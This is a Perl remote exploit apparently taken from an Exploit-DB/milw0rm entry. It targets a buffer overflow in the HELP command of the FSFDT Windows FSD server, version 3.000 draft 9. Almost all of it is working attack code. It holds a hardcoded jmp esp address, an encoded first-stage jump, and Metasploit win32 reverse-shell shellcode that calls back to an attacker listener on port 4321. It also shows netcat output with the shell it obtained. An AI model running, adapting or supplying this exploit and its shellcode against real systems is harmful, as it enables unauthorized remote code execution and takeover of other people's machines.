FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow

EDB-ID:

4484


Author:

weak

Type:

remote


Platform:

Windows

Date:

2007-10-04


# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# 
# E:\draft\fsd1110\windows>_
# 
# -------------------------------------------

#!/usr/bin/perl

# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4

use IO::Socket;

if( $#ARGV < 1 )
{
	print "usage: perl ".$0." <ip> <port>";
	exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];

print "connecting...\n";
my $sock = new IO::Socket::INET (  PeerAddr => $ip,  PeerPort => $port,  Proto => 'tcp',  );
die "could not create socket: $!\n" unless $sock;

# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";

# encoded 'jmp 0x400' to jump to stage2
my $jmpcode = 
"\xeb\x11\x5e\x31\xc9\xb1\x1e\x80\x6c\x0e\xff\x35\x80\xe9\x01".
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x0e\x16\x0e\x69\x59\x8d".
"\x8d\x8d\x8d\xb5\x1d\x1c\x66\xfe\x9b\xb6\x1e\x30\x34\xb5\x65".
"\x36\x75\x17\x2f\x1d\x36\x3a\x36\x36";

# win32_reverse -  EXITFUNC=thread LHOST=10.0.0.2 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com
# bad chars: 0x00 0x0A 0x0D 0x20 0x29 
my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
"\x2a\x6e\x8f\x83\xeb\xfc\xe2\xf4\xe2\x40\x85\xc2\xf6\xd3\x91\x70".
"\xe1\x4a\xe5\xe3\x3a\x0e\xe5\xca\x22\xa1\x12\x8a\x66\x2b\x81\x04".
"\x51\x32\xe5\xd0\x3e\x2b\x85\xc6\x95\x1e\xe5\x8e\xf0\x1b\xae\x16".
"\xb2\xae\xae\xfb\x19\xeb\xa4\x82\x1f\xe8\x85\x7b\x25\x7e\x4a\xa7".
"\x6b\xcf\xe5\xd0\x3a\x2b\x85\xe9\x95\x26\x25\x04\x41\x36\x6f\x64".
"\x1d\x06\xe5\x06\x72\x0e\x72\xee\xdd\x1b\xb5\xeb\x95\x69\x5e\x04".
"\x5e\x26\xe5\xff\x02\x87\xe5\xcf\x16\x74\x06\x01\x50\x24\x82\xdf".
"\xe1\xfc\x08\xdc\x78\x42\x5d\xbd\x76\x5d\x1d\xbd\x41\x7e\x91\x5f".
"\x76\xe1\x83\x73\x25\x7a\x91\x59\x41\xa3\x8b\xe9\x9f\xc7\x66\x8d".
"\x4b\x40\x6c\x70\xce\x42\xb7\x86\xeb\x87\x39\x70\xc8\x79\x3d\xdc".
"\x4d\x69\x3d\xcc\x4d\xd5\xbe\xe7\x14\x2a\x6e\xeb\x78\x42\x7e\x6e".
"\x78\x79\xe7\x6e\x8b\x42\x82\x76\xb4\x4a\x39\x70\xc8\x40\x7e\xde".
"\x4b\xd5\xbe\xe9\x74\x4e\x08\xe7\x7d\x47\x04\xdf\x47\x03\xa2\x06".
"\xf9\x40\x2a\x06\xfc\x1b\xae\x7c\xb4\xbf\xe7\x72\xe0\x68\x43\x71".
"\x5c\x06\xe3\xf5\x26\x81\xc5\x24\x76\x58\x90\x3c\x08\xd5\x1b\xa7".
"\xe1\xfc\x35\xd8\x4c\x7b\x3f\xde\x74\x2b\x3f\xde\x4b\x7b\x91\x5f".
"\x76\x87\xb7\x8a\xd0\x79\x91\x59\x74\xd5\x91\xb8\xe1\xfa\x06\x68".
"\x67\xec\x17\x70\x6b\x2e\x91\x59\xe1\x5d\x92\x70\xce\x42\x81\x41".
"\xfe\x4a\x3d\x70\xc8\xd5\xbe\x8f";

print "sending payload...\n";
print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" . "\x90"x400 . $shellcode;
close($sock);

print "done.\n";

# milw0rm.com [2007-10-04]